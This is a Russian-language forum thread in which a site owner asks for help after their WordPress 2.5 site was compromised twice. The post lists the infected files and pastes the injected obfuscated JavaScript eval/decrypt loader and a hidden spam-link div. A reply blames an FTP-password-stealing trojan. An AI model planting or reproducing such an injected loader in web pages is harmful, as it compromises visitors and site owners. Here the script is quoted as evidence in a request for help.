Взломали WordPress 2.5
При открытии главной страници выводится сообщение:
Warning: Cannot modify header information – headers already sent by (output started at /sata1/home/users/namitours/www/www.namitours.com/wp-includes/default-filters.php:191) in /sata1/home/users/namitours/www/www.namitours.com/wp-includes/pluggable.php on line 694.
Файлы которые подвержены атаке:
index.php
wp-admin\page.php
wp-admin\index.php
wp-admin\index-extra.php
wp-admin\includes\template.php
wp-content\index.php
wp-content\themes\default\footer.php
wp-content\themes\default\index.php
wp-content\themes\default\page.php
wp-includes\default-filters.php
wp-includes\pluggable.php
wp-includes\js\tinymce\plugins\inlinepopups\template.htm
Во всех этих файлах в конце дописывается пару строк (как я понял это какой-то криптор):
<!– o –><noindex><script>function load(code,dfunc,anticasp){eval(dfunc);decrypt(code);}load(‘<`B15ni[g`(QZIm[Zi`lZQIm[~S1(i1Iu[B15ni~S1(i1Iu[X1hI\"ZQQFx;;lSSloi{QSF.`Y\"><;`B15ni>’,unescape(‘function decrypt%28n%29%7Bvar l%2Cch%2Cind%2Cq%3D%22%22%2Ckey%3D%22OD%26%3Ax9T6H%40fBAC%23y_wgloSEb%7EK %5BchZei%60a5z-%7Bjv%21Pk%7Cr1mnYU%7DqV7%2F%3BpF%5DsXG%3DILtQJ0u%5C%272Md%284%2A%22%3Bfor%28l%3D0%3Bl%3Cn.length%3Bl%2B%2B%29%7Bch%3Dn.charAt%28l%29%3Bind%3Dkey.indexOf%28ch%29%3Bif%28ind%3E-1%29%7Bif%28ind%3D%3D0%29%7Bind %3D79%7Dq%2B%3Dkey.charAt%28ind-1%29%7D else %7Bq%2B%3Dch%7D%7D%3Bdocument.write%28q%29%7D’));</script></noindex>
<div style="OVERFLOW: auto; HEIGHT: 1px">
<a href="http://Bla-Bla-Bla-Bla-Bla-Bla.net">Bla-Bla-Bla-Bla-Bla-Bla</a></div><!– c –>
(там где "Bla-Bla-Bla-Bla-Bla-Bla" ссылка на поно сайт, муть короче…)
Вот права на папки:
wp-includes 751
wp-content 755
wp-content\plugins 755
wp-content\uploads 777
wp-content\themes 777
wp-admin 711
.htaccess присутствует.
<Files ~ "^.ht">
Order allow,deny
Deny from all
Satisfy All
</Files>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
- BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
- END WordPress
Это уже второй раз атакуют, до этого права на папки были другие, после атаки всё поменял и изменил пароли, но, опять атаковали. Помогите пожалуйста, как можно защититься?
Спасибо!
У меня такое было.
Завелся на маей машине троян, украл ftp аз far и totalcommander, коннектился к сайтам и начинал там кодить ;).
Самое парадоксальное, что не NOD, не Каспер его не нашел, пришлось переустанавливать систему и менять пароли 🙁 …